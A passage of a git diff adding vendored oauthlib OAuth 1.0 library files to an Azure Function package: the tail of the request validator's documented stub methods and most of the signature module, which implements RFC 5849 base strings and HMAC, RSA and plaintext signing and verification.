Ensure latency inducing tasks are mimiced even for dummy clients. + For example, use:: + + from your_datastore import AccessToken + try: + return AccessToken.exists(client_key, access_token) + except DoesNotExist: + return False + + Rather than:: + + from your_datastore import AccessToken + if access_token == self.dummy_access_token: + return False + else: + return AccessToken.exists(client_key, access_token) + + This method is used by + + * ResourceEndpoint + """ + raise self._subclass_must_implement("validate_access_token") + + def validate_timestamp_and_nonce(self, client_key, timestamp, nonce, + request, request_token=None, access_token=None): + """Validates that the nonce has not been used before. + + :param client_key: The client/consumer key. + :param timestamp: The ``oauth_timestamp`` parameter. + :param nonce: The ``oauth_nonce`` parameter. + :param request_token: Request token string, if any. + :param access_token: Access token string, if any. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :returns: True or False + + Per `Section 3.3`_ of the spec. + + "A nonce is a random string, uniquely generated by the client to allow + the server to verify that a request has never been made before and + helps prevent replay attacks when requests are made over a non-secure + channel. The nonce value MUST be unique across all requests with the + same timestamp, client credentials, and token combinations." + + .. _`Section 3.3`: https://tools.ietf.org/html/rfc5849#section-3.3 + + One of the first validation checks that will be made is for the validity + of the nonce and timestamp, which are associated with a client key and + possibly a token. If invalid then immediately fail the request + by returning False. If the nonce/timestamp pair has been used before and + you may just have detected a replay attack. Therefore it is an essential + part of OAuth security that you not allow nonce/timestamp reuse. + Note that this validation check is done before checking the validity of + the client and token.:: + + nonces_and_timestamps_database = [ + (u'foo', 1234567890, u'rannoMstrInghere', u'bar') + ] + + def validate_timestamp_and_nonce(self, client_key, timestamp, nonce, + request_token=None, access_token=None): + + return ((client_key, timestamp, nonce, request_token or access_token) + not in self.nonces_and_timestamps_database) + + This method is used by + + * AccessTokenEndpoint + * RequestTokenEndpoint + * ResourceEndpoint + * SignatureOnlyEndpoint + """ + raise self._subclass_must_implement("validate_timestamp_and_nonce") + + def validate_redirect_uri(self, client_key, redirect_uri, request): + """Validates the client supplied redirection URI. + + :param client_key: The client/consumer key. + :param redirect_uri: The URI the client which to redirect back to after + authorization is successful. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :returns: True or False + + It is highly recommended that OAuth providers require their clients + to register all redirection URIs prior to using them in requests and + register them as absolute URIs. See `CWE-601`_ for more information + about open redirection attacks. + + By requiring registration of all redirection URIs it should be + straightforward for the provider to verify whether the supplied + redirect_uri is valid or not. + + Alternatively per `Section 2.1`_ of the spec: + + "If the client is unable to receive callbacks or a callback URI has + been established via other means, the parameter value MUST be set to + "oob" (case sensitive), to indicate an out-of-band configuration." + + .. _`CWE-601`: http://cwe.mitre.org/top25/index.html#CWE-601 + .. _`Section 2.1`: https://tools.ietf.org/html/rfc5849#section-2.1 + + This method is used by + + * RequestTokenEndpoint + """ + raise self._subclass_must_implement("validate_redirect_uri") + + def validate_requested_realms(self, client_key, realms, request): + """Validates that the client may request access to the realm. + + :param client_key: The client/consumer key. + :param realms: The list of realms that client is requesting access to. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :returns: True or False + + This method is invoked when obtaining a request token and should + tie a realm to the request token and after user authorization + this realm restriction should transfer to the access token. + + This method is used by + + * RequestTokenEndpoint + """ + raise self._subclass_must_implement("validate_requested_realms") + + def validate_realms(self, client_key, token, request, uri=None, + realms=None): + """Validates access to the request realm. + + :param client_key: The client/consumer key. + :param token: A request token string. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :param uri: The URI the realms is protecting. + :param realms: A list of realms that must have been granted to + the access token. + :returns: True or False + + How providers choose to use the realm parameter is outside the OAuth + specification but it is commonly used to restrict access to a subset + of protected resources such as "photos". + + realms is a convenience parameter which can be used to provide + a per view method pre-defined list of allowed realms. + + Can be as simple as:: + + from your_datastore import RequestToken + request_token = RequestToken.get(token, None) + + if not request_token: + return False + return set(request_token.realms).issuperset(set(realms)) + + This method is used by + + * ResourceEndpoint + """ + raise self._subclass_must_implement("validate_realms") + + def validate_verifier(self, client_key, token, verifier, request): + """Validates a verification code. + + :param client_key: The client/consumer key. + :param token: A request token string. + :param verifier: The authorization verifier string. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :returns: True or False + + OAuth providers issue a verification code to clients after the + resource owner authorizes access. This code is used by the client to + obtain token credentials and the provider must verify that the + verifier is valid and associated with the client as well as the + resource owner. + + Verifier validation should be done in near constant time + (to avoid verifier enumeration). To achieve this we need a + constant time string comparison which is provided by OAuthLib + in ``oauthlib.common.safe_string_equals``:: + + from your_datastore import Verifier + correct_verifier = Verifier.get(client_key, request_token) + from oauthlib.common import safe_string_equals + return safe_string_equals(verifier, correct_verifier) + + This method is used by + + * AccessTokenEndpoint + """ + raise self._subclass_must_implement("validate_verifier") + + def verify_request_token(self, token, request): + """Verify that the given OAuth1 request token is valid. + + :param token: A request token string. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :returns: True or False + + This method is used only in AuthorizationEndpoint to check whether the + oauth_token given in the authorization URL is valid or not. + This request is not signed and thus similar ``validate_request_token`` + method can not be used. + + This method is used by + + * AuthorizationEndpoint + """ + raise self._subclass_must_implement("verify_request_token") + + def verify_realms(self, token, realms, request): + """Verify authorized realms to see if they match those given to token. + + :param token: An access token string. + :param realms: A list of realms the client attempts to access. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :returns: True or False + + This prevents the list of authorized realms sent by the client during + the authorization step to be altered to include realms outside what + was bound with the request token. + + Can be as simple as:: + + valid_realms = self.get_realms(token) + return all((r in valid_realms for r in realms)) + + This method is used by + + * AuthorizationEndpoint + """ + raise self._subclass_must_implement("verify_realms") + + def save_access_token(self, token, request): + """Save an OAuth1 access token. + + :param token: A dict with token credentials. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + + The token dictionary will at minimum include + + * ``oauth_token`` the access token string. + * ``oauth_token_secret`` the token specific secret used in signing. + * ``oauth_authorized_realms`` a space separated list of realms. + + Client key can be obtained from ``request.client_key``. + + The list of realms (not joined string) can be obtained from + ``request.realm``. + + This method is used by + + * AccessTokenEndpoint + """ + raise self._subclass_must_implement("save_access_token") + + def save_request_token(self, token, request): + """Save an OAuth1 request token. + + :param token: A dict with token credentials. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + + The token dictionary will at minimum include + + * ``oauth_token`` the request token string. + * ``oauth_token_secret`` the token specific secret used in signing. + * ``oauth_callback_confirmed`` the string ``true``. + + Client key can be obtained from ``request.client_key``. + + This method is used by + + * RequestTokenEndpoint + """ + raise self._subclass_must_implement("save_request_token") + + def save_verifier(self, token, verifier, request): + """Associate an authorization verifier with a request token. + + :param token: A request token string. + :param verifier A dictionary containing the oauth_verifier and + oauth_token + :param request: OAuthlib request. + :type request: oauthlib.common.Request + + We need to associate verifiers with tokens for validation during the + access token request. + + Note that unlike save_x_token token here is the ``oauth_token`` token + string from the request token saved previously. + + This method is used by + + * AuthorizationEndpoint + """ + raise self._subclass_must_implement("save_verifier") diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/signature.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/signature.py new file mode 100644 index 0000000..d648102 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/signature.py @@ -0,0 +1,843 @@ +""" +This module is an implementation of `section 3.4`_ of RFC 5849. + +**Usage** + +Steps for signing a request: + +1. Collect parameters from the request using ``collect_parameters``. +2. Normalize those parameters using ``normalize_parameters``. +3. Create the *base string URI* using ``base_string_uri``. +4. Create the *signature base string* from the above three components + using ``signature_base_string``. +5. Pass the *signature base string* and the client credentials to one of the + sign-with-client functions. The HMAC-based signing functions needs + client credentials with secrets. The RSA-based signing functions needs + client credentials with an RSA private key. + +To verify a request, pass the request and credentials to one of the verify +functions. The HMAC-based signing functions needs the shared secrets. The +RSA-based verify functions needs the RSA public key. + +**Scope** + +All of the functions in this module should be considered internal to OAuthLib, +since they are not imported into the "oauthlib.oauth1" module. Programs using +OAuthLib should not use directly invoke any of the functions in this module. + +**Deprecated functions** + +The "sign_" methods that are not "_with_client" have been deprecated. They may +be removed in a future release. Since they are all internal functions, this +should have no impact on properly behaving programs. + +.. _`section 3.4`: https://tools.ietf.org/html/rfc5849#section-3.4 +""" + +import binascii +import hashlib +import hmac +import logging +import warnings + +from oauthlib.common import extract_params, safe_string_equals, urldecode +import urllib.parse as urlparse + +from . import utils + + +log = logging.getLogger(__name__) + + +# ==== Common functions ========================================== + +def signature_base_string( + http_method: str, + base_str_uri: str, + normalized_encoded_request_parameters: str) -> str: + """ + Construct the signature base string. + + The *signature base string* is the value that is calculated and signed by + the client. It is also independently calculated by the server to verify + the signature, and therefore must produce the exact same value at both + ends or the signature won't verify. + + The rules for calculating the *signature base string* are defined in + section 3.4.1.1`_ of RFC 5849. + + .. _`section 3.4.1.1`: https://tools.ietf.org/html/rfc5849#section-3.4.1.1 + """ + + # The signature base string is constructed by concatenating together, + # in order, the following HTTP request elements: + + # 1. The HTTP request method in uppercase. For example: "HEAD", + # "GET", "POST", etc. If the request uses a custom HTTP method, it + # MUST be encoded (`Section 3.6`_). + # + # .. _`Section 3.6`: https://tools.ietf.org/html/rfc5849#section-3.6 + base_string = utils.escape(http_method.upper()) + + # 2. An "&" character (ASCII code 38). + base_string += '&' + + # 3. The base string URI from `Section 3.4.1.2`_, after being encoded + # (`Section 3.6`_). + # + # .. _`Section 3.4.1.2`: https://tools.ietf.org/html/rfc5849#section-3.4.1.2 + # .. _`Section 3.6`: https://tools.ietf.org/html/rfc5849#section-3.6 + base_string += utils.escape(base_str_uri) + + # 4. An "&" character (ASCII code 38). + base_string += '&' + + # 5. The request parameters as normalized in `Section 3.4.1.3.2`_, after + # being encoded (`Section 3.6`). + # + # .. _`Sec 3.4.1.3.2`: https://tools.ietf.org/html/rfc5849#section-3.4.1.3.2 + # .. _`Section 3.6`: https://tools.ietf.org/html/rfc5849#section-3.6 + base_string += utils.escape(normalized_encoded_request_parameters) + + return base_string + + +def base_string_uri(uri: str, host: str = None) -> str: + """ + Calculates the _base string URI_. + + The *base string URI* is one of the components that make up the + *signature base string*. + + The ``host`` is optional. If provided, it is used to override any host and + port values in the ``uri``. The value for ``host`` is usually extracted from + the "Host" request header from the HTTP request. Its value may be just the + hostname, or the hostname followed by a colon and a TCP/IP port number + (hostname:port). If a value for the``host`` is provided but it does not + contain a port number, the default port number is used (i.e. if the ``uri`` + contained a port number, it will be discarded). + + The rules for calculating the *base string URI* are defined in + section 3.4.1.2`_ of RFC 5849. + + .. _`section 3.4.1.2`: https://tools.ietf.org/html/rfc5849#section-3.4.1.2 + + :param uri: URI + :param host: hostname with optional port number, separated by a colon + :return: base string URI + """ + + if not isinstance(uri, str): + raise ValueError('uri must be a string.') + + # FIXME: urlparse does not support unicode + scheme, netloc, path, params, query, fragment = urlparse.urlparse(uri) + + # The scheme, authority, and path of the request resource URI `RFC3986` + # are included by constructing an "http" or "https" URI representing + # the request resource (without the query or fragment) as follows: + # + # .. _`RFC3986`: https://tools.ietf.org/html/rfc3986 + + if not scheme: + raise ValueError('missing scheme') + + # Per `RFC 2616 section 5.1.2`_: + # + # Note that the absolute path cannot be empty; if none is present in + # the original URI, it MUST be given as "/" (the server root). + # + # .. _`RFC 2616 5.1.2`: https://tools.ietf.org/html/rfc2616#section-5.1.2 + if not path: + path = '/' + + # 1. The scheme and host MUST be in lowercase. + scheme = scheme.lower() + netloc = netloc.lower() + # Note: if ``host`` is used, it will be converted to lowercase below + + # 2. The host and port values MUST match the content of the HTTP + # request "Host" header field. + if host is not None: + netloc = host.lower() # override value in uri with provided host + + # 3. The port MUST be included if it is not the default port for the + # scheme, and MUST be excluded if it is the default. Specifically, + # the port MUST be excluded when making an HTTP request `RFC2616`_ + # to port 80 or when making an HTTPS request `RFC2818`_ to port 443. + # All other non-default port numbers MUST be included. + # + # .. _`RFC2616`: https://tools.ietf.org/html/rfc2616 + # .. _`RFC2818`: https://tools.ietf.org/html/rfc2818 + + if ':' in netloc: + # Contains a colon ":", so try to parse as "host:port" + + hostname, port_str = netloc.split(':', 1) + + if len(hostname) == 0: + raise ValueError('missing host') # error: netloc was ":port" or ":" + + if len(port_str) == 0: + netloc = hostname # was "host:", so just use the host part + else: + try: + port_num = int(port_str) # try to parse into an integer number + except ValueError: + raise ValueError('port is not an integer') + + if port_num <= 0 or 65535 < port_num: + raise ValueError('port out of range') # 16-bit unsigned ints + if (scheme, port_num) in (('http', 80), ('https', 443)): + netloc = hostname # default port for scheme: exclude port num + else: + netloc = hostname + ':' + str(port_num) # use hostname:port + else: + # Does not contain a colon, so entire value must be the hostname + + if len(netloc) == 0: + raise ValueError('missing host') # error: netloc was empty string + + v = urlparse.urlunparse((scheme, netloc, path, params, '', '')) + + # RFC 5849 does not specify which characters are encoded in the + # "base string URI", nor how they are encoded - which is very bad, since + # the signatures won't match if there are any differences. Fortunately, + # most URIs only use characters that are clearly not encoded (e.g. digits + # and A-Z, a-z), so have avoided any differences between implementations. + # + # The example from its section 3.4.1.2 illustrates that spaces in + # the path are percent encoded. But it provides no guidance as to what other + # characters (if any) must be encoded (nor how); nor if characters in the + # other components are to be encoded or not. + # + # This implementation **assumes** that **only** the space is percent-encoded + # and it is done to the entire value (not just to spaces in the path). + # + # This code may need to be changed if it is discovered that other characters + # are expected to be encoded. + # + # Note: the "base string URI" returned by this function will be encoded + # again before being concatenated into the "signature base string". So any + # spaces in the URI will actually appear in the "signature base string" + # as "%2520" (the "%20" further encoded according to section 3.6). + + return v.replace(' ', '%20') + + +def collect_parameters(uri_query='', body=None, headers=None, + exclude_oauth_signature=True, with_realm=False): + """ + Gather the request parameters from all the parameter sources. + + This function is used to extract all the parameters, which are then passed + to ``normalize_parameters`` to produce one of the components that make up + the *signature base string*. + + Parameters starting with `oauth_` will be unescaped. + + Body parameters must be supplied as a dict, a list of 2-tuples, or a + form encoded query string. + + Headers must be supplied as a dict. + + The rules where the parameters must be sourced from are defined in + `section 3.4.1.3.1`_ of RFC 5849. + + .. _`Sec 3.4.1.3.1`: https://tools.ietf.org/html/rfc5849#section-3.4.1.3.1 + """ + if body is None: + body = [] + headers = headers or {} + params = [] + + # The parameters from the following sources are collected into a single + # list of name/value pairs: + + # * The query component of the HTTP request URI as defined by + # `RFC3986, Section 3.4`_. The query component is parsed into a list + # of name/value pairs by treating it as an + # "application/x-www-form-urlencoded" string, separating the names + # and values and decoding them as defined by W3C.REC-html40-19980424 + # `W3C-HTML-4.0`_, Section 17.13.4. + # + # .. _`RFC3986, Sec 3.4`: https://tools.ietf.org/html/rfc3986#section-3.4 + # .. _`W3C-HTML-4.0`: https://www.w3.org/TR/1998/REC-html40-19980424/ + if uri_query: + params.extend(urldecode(uri_query)) + + # * The OAuth HTTP "Authorization" header field (`Section 3.5.1`_) if + # present. The header's content is parsed into a list of name/value + # pairs excluding the "realm" parameter if present. The parameter + # values are decoded as defined by `Section 3.5.1`_. + # + # .. _`Section 3.5.1`: https://tools.ietf.org/html/rfc5849#section-3.5.1 + if headers: + headers_lower = {k.lower(): v for k, v in headers.items()} + authorization_header = headers_lower.get('authorization') + if authorization_header is not None: + params.extend([i for i in utils.parse_authorization_header( + authorization_header) if with_realm or i[0] != 'realm']) + + # * The HTTP request entity-body, but only if all of the following + # conditions are met: + # * The entity-body is single-part. + # + # * The entity-body follows the encoding requirements of the + # "application/x-www-form-urlencoded" content-type as defined by + # W3C.REC-html40-19980424 `W3C-HTML-4.0`_. + + # * The HTTP request entity-header includes the "Content-Type" + # header field set to "application/x-www-form-urlencoded". + # + # .. _`W3C-HTML-4.0`: https://www.w3.org/TR/1998/REC-html40-19980424/ + + # TODO: enforce header param inclusion conditions + bodyparams = extract_params(body) or [] + params.extend(bodyparams) + + # ensure all oauth params are unescaped + unescaped_params = [] + for k, v in params: + if k.startswith('oauth_'): + v = utils.unescape(v) + unescaped_params.append((k, v)) + + # The "oauth_signature" parameter MUST be excluded from the signature + # base string if present. + if exclude_oauth_signature: + unescaped_params = list(filter(lambda i: i[0] != 'oauth_signature', + unescaped_params)) + + return unescaped_params + + +def normalize_parameters(params) -> str: + """ + Calculate the normalized request parameters. + + The *normalized request parameters* is one of the components that make up + the *signature base string*. + + The rules for parameter normalization are defined in `section 3.4.1.3.2`_ of + RFC 5849. + + .. _`Sec 3.4.1.3.2`: https://tools.ietf.org/html/rfc5849#section-3.4.1.3.2 + """ + + # The parameters collected in `Section 3.4.1.3`_ are normalized into a + # single string as follows: + # + # .. _`Section 3.4.1.3`: https://tools.ietf.org/html/rfc5849#section-3.4.1.3 + + # 1. First, the name and value of each parameter are encoded + # (`Section 3.6`_). + # + # .. _`Section 3.6`: https://tools.ietf.org/html/rfc5849#section-3.6 + key_values = [(utils.escape(k), utils.escape(v)) for k, v in params] + + # 2. The parameters are sorted by name, using ascending byte value + # ordering. If two or more parameters share the same name, they + # are sorted by their value. + key_values.sort() + + # 3. The name of each parameter is concatenated to its corresponding + # value using an "=" character (ASCII code 61) as a separator, even + # if the value is empty. + parameter_parts = ['{}={}'.format(k, v) for k, v in key_values] + + # 4. The sorted name/value pairs are concatenated together into a + # single string by using an "&" character (ASCII code 38) as + # separator. + return '&'.join(parameter_parts) + + +# ==== Common functions for HMAC-based signature methods ========= + +def _sign_hmac(hash_algorithm_name: str, + sig_base_str: str, + client_secret: str, + resource_owner_secret: str): + """ + **HMAC-SHA256** + + The "HMAC-SHA256" signature method uses the HMAC-SHA256 signature + algorithm as defined in `RFC4634`_:: + + digest = HMAC-SHA256 (key, text) + + Per `section 3.4.2`_ of the spec. + + .. _`RFC4634`: https://tools.ietf.org/html/rfc4634 + .. _`section 3.4.2`: https://tools.ietf.org/html/rfc5849#section-3.4.2 + """ + + # The HMAC-SHA256 function variables are used in following way: + + # text is set to the value of the signature base string from + # `Section 3.4.1.1`_. + # + # .. _`Section 3.4.1.1`: https://tools.ietf.org/html/rfc5849#section-3.4.1.1 + text = sig_base_str + + # key is set to the concatenated values of: + # 1. The client shared-secret, after being encoded (`Section 3.6`_). + # + # .. _`Section 3.6`: https://tools.ietf.org/html/rfc5849#section-3.6 + key = utils.escape(client_secret or '') + + # 2. An "&" character (ASCII code 38), which MUST be included + # even when either secret is empty. + key += '&' + + # 3. The token shared-secret, after being encoded (`Section 3.6`_). + # + # .. _`Section 3.6`: https://tools.ietf.org/html/rfc5849#section-3.6 + key += utils.escape(resource_owner_secret or '') + + # Get the hashing algorithm to use + + m = { + 'SHA-1': hashlib.sha1, + 'SHA-256': hashlib.sha256, + 'SHA-512': hashlib.sha512, + } + hash_alg = m[hash_algorithm_name] + + # Calculate the signature + + # FIXME: HMAC does not support unicode! + key_utf8 = key.encode('utf-8') + text_utf8 = text.encode('utf-8') + signature = hmac.new(key_utf8, text_utf8, hash_alg) + + # digest is used to set the value of the "oauth_signature" protocol + # parameter, after the result octet string is base64-encoded + # per `RFC2045, Section 6.8`. + # + # .. _`RFC2045, Sec 6.8`: https://tools.ietf.org/html/rfc2045#section-6.8 + return binascii.b2a_base64(signature.digest())[:-1].decode('utf-8') + + +def _verify_hmac(hash_algorithm_name: str, + request, + client_secret=None, + resource_owner_secret=None): + """Verify a HMAC-SHA1 signature. + + Per `section 3.4`_ of the spec. + + .. _`section 3.4`: https://tools.ietf.org/html/rfc5849#section-3.4 + + To satisfy `RFC2616 section 5.2`_ item 1, the request argument's uri + attribute MUST be an absolute URI whose netloc part identifies the + origin server or gateway on which the resource resides. Any Host + item of the request argument's headers dict attribute will be + ignored. + + .. _`RFC2616 section 5.2`: https://tools.ietf.org/html/rfc2616#section-5.2 + + """ + norm_params = normalize_parameters(request.params) + bs_uri = base_string_uri(request.uri) + sig_base_str = signature_base_string(request.http_method, bs_uri, + norm_params) + signature = _sign_hmac(hash_algorithm_name, sig_base_str, + client_secret, resource_owner_secret) + match = safe_string_equals(signature, request.signature) + if not match: + log.debug('Verify HMAC failed: signature base string: %s', sig_base_str) + return match + + +# ==== HMAC-SHA1 ================================================= + +def sign_hmac_sha1_with_client(sig_base_str, client): + return _sign_hmac('SHA-1', sig_base_str, + client.client_secret, client.resource_owner_secret) + + +def verify_hmac_sha1(request, client_secret=None, resource_owner_secret=None): + return _verify_hmac('SHA-1', request, client_secret, resource_owner_secret) + + +def sign_hmac_sha1(base_string, client_secret, resource_owner_secret): + """ + Deprecated function for calculating a HMAC-SHA1 signature. + + This function has been replaced by invoking ``sign_hmac`` with "SHA-1" + as the hash algorithm name. + + This function was invoked by sign_hmac_sha1_with_client and + test_signatures.py, but does any application invoke it directly? If not, + it can be removed. + """ + warnings.warn('use sign_hmac_sha1_with_client instead of sign_hmac_sha1', + DeprecationWarning) + + # For some unknown reason, the original implementation assumed base_string + # could either be bytes or str. The signature base string calculating + # function always returned a str, so the new ``sign_rsa`` only expects that. + + base_string = base_string.decode('ascii') \ + if isinstance(base_string, bytes) else base_string + + return _sign_hmac('SHA-1', base_string, + client_secret, resource_owner_secret) + + +# ==== HMAC-SHA256 =============================================== + +def sign_hmac_sha256_with_client(sig_base_str, client): + return _sign_hmac('SHA-256', sig_base_str, + client.client_secret, client.resource_owner_secret) + + +def verify_hmac_sha256(request, client_secret=None, resource_owner_secret=None): + return _verify_hmac('SHA-256', request, + client_secret, resource_owner_secret) + + +def sign_hmac_sha256(base_string, client_secret, resource_owner_secret): + """ + Deprecated function for calculating a HMAC-SHA256 signature. + + This function has been replaced by invoking ``sign_hmac`` with "SHA-256" + as the hash algorithm name. + + This function was invoked by sign_hmac_sha256_with_client and + test_signatures.py, but does any application invoke it directly? If not, + it can be removed. + """ + warnings.warn( + 'use sign_hmac_sha256_with_client instead of sign_hmac_sha256', + DeprecationWarning) + + # For some unknown reason, the original implementation assumed base_string + # could either be bytes or str. The signature base string calculating + # function always returned a str, so the new ``sign_rsa`` only expects that. + + base_string = base_string.decode('ascii') \ + if isinstance(base_string, bytes) else base_string + + return _sign_hmac('SHA-256', base_string, + client_secret, resource_owner_secret) + + +# ==== HMAC-SHA512 =============================================== + +def sign_hmac_sha512_with_client(sig_base_str: str, + client): + return _sign_hmac('SHA-512', sig_base_str, + client.client_secret, client.resource_owner_secret) + + +def verify_hmac_sha512(request, + client_secret: str = None, + resource_owner_secret: str = None): + return _verify_hmac('SHA-512', request, + client_secret, resource_owner_secret) + + +# ==== Common functions for RSA-based signature methods ========== + +_jwt_rsa = {} # cache of RSA-hash implementations from PyJWT jwt.algorithms + + +def _get_jwt_rsa_algorithm(hash_algorithm_name: str): + """ + Obtains an RSAAlgorithm object that implements RSA with the hash algorithm. + + This method maintains the ``_jwt_rsa`` cache. + + Returns a jwt.algorithm.RSAAlgorithm. + """ + if hash_algorithm_name in _jwt_rsa: + # Found in cache: return it + return _jwt_rsa[hash_algorithm_name] + else: + # Not in cache: instantiate a new RSAAlgorithm + + # PyJWT has some nice pycrypto/cryptography abstractions + import jwt.algorithms as jwt_algorithms + m = { + 'SHA-1': jwt_algorithms.hashes.SHA1, + 'SHA-256': jwt_algorithms.hashes.SHA256, + 'SHA-512': jwt_algorithms.hashes.SHA512, + } + v = jwt_algorithms.RSAAlgorithm(m[hash_algorithm_name]) + + _jwt_rsa[hash_algorithm_name] = v # populate cache + + return v + + +def _prepare_key_plus(alg, keystr): + """ + Prepare a PEM encoded key (public or private), by invoking the `prepare_key` + method on alg with the keystr. + + The keystr should be a string or bytes. If the keystr is bytes, it is + decoded as UTF-8 before being passed to prepare_key. Otherwise, it + is passed directly. + """ + if isinstance(keystr, bytes): + keystr = keystr.decode('utf-8') + return alg.prepare_key(keystr) + + +def _sign_rsa(hash_algorithm_name: str, + sig_base_str: str, + rsa_private_key: str): + """ + Calculate the signature for an RSA-based signature method. + + The ``alg`` is used to calculate the digest over the signature base string. + For the "RSA_SHA1" signature method, the alg must be SHA-1. While OAuth 1.0a + only defines the RSA-SHA1 signature method, this function can be used for + other non-standard signature methods that only differ from RSA-SHA1 by the + digest algorithm. + + Signing for the RSA-SHA1 signature method is defined in + `section 3.4.3`_ of RFC 5849. + + The RSASSA-PKCS1-v1_5 signature algorithm used defined by + `RFC3447, Section 8.2`_ (also known as PKCS#1), with the `alg` as the + hash function for EMSA-PKCS1-v1_5. To + use this method, the client MUST have established client credentials + with the server that included its RSA public key (in a manner that is + beyond the scope of this specification). + + .. _`section 3.4.3`: https://tools.ietf.org/html/rfc5849#section-3.4.3 + .. _`RFC3447, Section 8.2`: https://tools.ietf.org/html/rfc3447#section-8.2 + """ + + # Get the implementation of RSA-hash + + alg = _get_jwt_rsa_algorithm(hash_algorithm_name) + + # Check private key + + if not rsa_private_key: + raise ValueError('rsa_private_key required for RSA with ' + + alg.hash_alg.name + ' signature method') + + # Convert the "signature base string" into a sequence of bytes (M) + # + # The signature base string, by definition, only contain printable US-ASCII + # characters. So encoding it as 'ascii' will always work. It will raise a + # ``UnicodeError`` if it can't encode the value, which will never happen + # if the signature base string was created correctly. Therefore, using + # 'ascii' encoding provides an extra level of error checking. + + m = sig_base_str.encode('ascii') + + # Perform signing: S = RSASSA-PKCS1-V1_5-SIGN (K, M) + + key = _prepare_key_plus(alg, rsa_private_key) + s = alg.sign(m, key) + + # base64-encoded per RFC2045 section 6.8. + # + # 1. While b2a_base64 implements base64 defined by RFC 3548. As used here, + # it is the same as base64 defined by RFC 2045. + # 2. b2a_base64 includes a "\n" at the end of its result ([:-1] removes it) + # 3. b2a_base64 produces a binary string. Use decode to produce a str. + # It should only contain only printable US-ASCII characters. + + return binascii.b2a_base64(s)[:-1].decode('ascii') + + +def _verify_rsa(hash_algorithm_name: str, + request, + rsa_public_key: str): + """ + Verify a base64 encoded signature for a RSA-based signature method. + + The ``alg`` is used to calculate the digest over the signature base string. + For the "RSA_SHA1" signature method, the alg must be SHA-1. While OAuth 1.0a + only defines the RSA-SHA1 signature method, this function can be used for + other non-standard signature methods that only differ from RSA-SHA1 by the + digest algorithm. + + Verification for the RSA-SHA1 signature method is defined in + `section 3.4.3`_ of RFC 5849. + + .. _`section 3.4.3`: https://tools.ietf.org/html/rfc5849#section-3.4.3 + + To satisfy `RFC2616 section 5.2`_ item 1, the request argument's uri + attribute MUST be an absolute URI whose netloc part identifies the + origin server or gateway on which the resource resides. Any Host + item of the request argument's headers dict attribute will be + ignored. + + .. _`RFC2616 Sec 5.2`: https://tools.ietf.org/html/rfc2616#section-5.2 + """ + + try: + # Calculate the *signature base string* of the actual received request + + norm_params = normalize_parameters(request.params) + bs_uri = base_string_uri(request.uri) + sig_base_str = signature_base_string( + request.http_method, bs_uri, norm_params) + + # Obtain the signature that was received in the request + + sig = binascii.a2b_base64(request.signature.encode('ascii')) + + # Get the implementation of RSA-with-hash algorithm to use + + alg = _get_jwt_rsa_algorithm(hash_algorithm_name) + + # Verify the received signature was produced by the private key + # corresponding to the `rsa_public_key`, signing exact same + # *signature base string*. + # + # RSASSA-PKCS1-V1_5-VERIFY ((n, e), M, S) + + key = _prepare_key_plus(alg, rsa_public_key) + + # The signature base string only contain printable US-ASCII characters. + # The ``encode`` method with the default "strict" error handling will + # raise a ``UnicodeError`` if it can't encode the value. So using + # "ascii" will always work. + + verify_ok = alg.verify(sig_base_str.encode('ascii'), key, sig) + + if not verify_ok: + log.debug('Verify failed: RSA with ' + alg.hash_alg.name + + ': signature base string=%s' + sig_base_str) + return verify_ok + + except UnicodeError: + # A properly encoded signature will only contain printable US-ASCII + # characters. The ``encode`` method with the default "strict" error + # handling will raise a ``UnicodeError`` if it can't decode the value. + # So using "ascii" will work with all valid signatures. But an + # incorrectly or maliciously produced signature could contain other + # bytes. + # + # This implementation treats that situation as equivalent to the + # signature verification having failed. + # + # Note: simply changing the encode to use 'utf-8' will not remove this + # case, since an incorrect or malicious request can contain bytes which + # are invalid as UTF-8. + return False + + +# ==== RSA-SHA1 ================================================== + +def sign_rsa_sha1_with_client(sig_base_str, client): + # For some reason, this function originally accepts both str and bytes. + # This behaviour is preserved here. But won't be done for the newer + # sign_rsa_sha256_with_client and sign_rsa_sha512_with_client functions, + # which will only accept strings. The function to calculate a + # "signature base string" always produces a string, so it is not clear + # why support for bytes would ever be needed. + sig_base_str = sig_base_str.decode('ascii')\ + if isinstance(sig_base_str, bytes) else sig_base_str + + return _sign_rsa('SHA-1', sig_base_str, client.rsa_key) + + +def verify_rsa_sha1(request, rsa_public_key: str): + return _verify_rsa('SHA-1', request, rsa_public_key) + + +def sign_rsa_sha1(base_string, rsa_private_key): + """ + Deprecated function for calculating a RSA-SHA1 signature. + + This function has been replaced by invoking ``sign_rsa`` with "SHA-1" + as the hash algorithm name. + + This function was invoked by sign_rsa_sha1_with_client and + test_signatures.py, but does any application invoke it directly? If not, + it can be removed. + """ + warnings.warn('use _sign_rsa("SHA-1", ...) instead of sign_rsa_sha1', + DeprecationWarning) + + if isinstance(base_string, bytes): + base_string = base_string.decode('ascii') + + return _sign_rsa('SHA-1', base_string, rsa_private_key) + + +# ==== RSA-SHA256 ================================================ + +def sign_rsa_sha256_with_client(sig_base_str: str, client): + return _sign_rsa('SHA-256', sig_base_str, client.rsa_key) + + +def verify_rsa_sha256(request, rsa_public_key: str): + return _verify_rsa('SHA-256', request, rsa_public_key) + + +# ==== RSA-SHA512 ================================================ + +def sign_rsa_sha512_with_client(sig_base_str: str, client): + return _sign_rsa('SHA-512', sig_base_str, client.rsa_key) + + +def verify_rsa_sha512(request, rsa_public_key: str): + return _verify_rsa('SHA-512', request, rsa_public_key) + + +# ==== PLAINTEXT ================================================= + +def sign_plaintext_with_client(_signature_base_string, client): + # _signature_base_string is not used because the signature with PLAINTEXT + # is just the secret: it isn't a real signature. + return sign_plaintext(client.client_secret, client.resource_owner_secret) + + +def sign_plaintext(client_secret, resource_owner_secret): + """Sign a request using plaintext. + + Per `section 3.4.4`_ of the spec. + 